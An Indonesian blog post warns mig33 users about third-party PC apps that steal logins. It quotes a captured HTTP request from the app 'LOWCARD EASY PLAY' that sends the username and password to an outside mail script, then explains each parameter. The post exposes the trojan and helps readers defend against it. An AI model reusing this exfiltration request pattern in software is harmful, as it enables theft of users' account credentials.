Tips aman memilih Aplikasi mig33

Selasa, 15 November 2011
Sekarang makin banyak aja aplikasi aplikasi mig33 buat PC,  Mulai dari kicking, flooding, Abuser, dan lain lainnya.
Makin banyak aplikasi aplikasi yang beredar tentunya akan makin banyak pula fikiran fikiran iseng dari sang pembuat aplikasi ..
sampai sampai Ada aplikasi yang send password id kita lah ini lah itu lah .
Contohnya neh saya Kasih contoh salah satu aplikasi yang menurut saya kurang kreatif caranya buat nge Maling Id wkwkwkwkwkw.........

LOWCARD EASY PLAY, begitulah nama aplikasinya , ga tau juga siapa yang bikin neh , yang jelas ini aplikasi Send password ID yang mencoba Login di aplikasi ini , kenapa saya bilang mencoba ??? karena aplikasi ini sama sekali ga ngirim paket paket dari mig33 pada saat login





.....  :D  .....
Nah dari screenshot yang ini, dah ketahuan tuh aplikasi itu merupakan jebakan bagi user mig33, karena saat di record pada waktu pengen nge login malah paket yang di dapat adalah paket ini :
[GET /send.php?mail=info@marchent.net&subject=username&body=password HTTP/1.1..Accept: */*..Accept-Language: th..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)..Host: marchent.net..Connection: Keep-Alive....]
Bukannya paket login dari mig33 yang kita dapatkan :D , paket di atas akan mengirim User id kita dan password kita
/send.php?mail=info@marchent.net = Email penerima
subject= Username kita
body= password kita

 Sedikit tips dari saya buat yang suka download aplikasi mig33 biar lebih aman
1. Bikin applikasi sendiri :D
2. Pilih aplikasi yang jelas nama Creator nya, minimal tuh creator dah berkreasi di Aplikasi2 mig33
3. Download aplikasi di forum2 yang udah terpercaya, paling gak tuh aplikasi sudah di cek sama Anak2 di forum itu
4. Jangan Coba pakai Aplikasi yang berbau CRACKED
Sekarang aplikasi yang rawan dengan send password kaya gitu aplikasi Admin, Game,dan  kebanyakan aplikasi aplikasi yang login dengan  1 id . dan itu bukan hanya aplikasi PC aja, aplikasi2 berbentuk file .jar yang buat di Hp juga patut dicurigai , paling gak kita tau tuh aplikasi editan siapa jangan main comot aja , paling gak kita pakai aplikasi .jar editan yang udah top lah editornya :D


Terima kasih sudah membaca Tips aman memilih Aplikasi mig33 dan sempatkan untuk membaca yang lainnya broth..
TEMPLATE DESIGN BY
m-template - by: bagas96

0 komentar:

copy smiley kode

Posting Komentar

I orange fress script kang bagas96 copyright 2011
diteri.mig33.us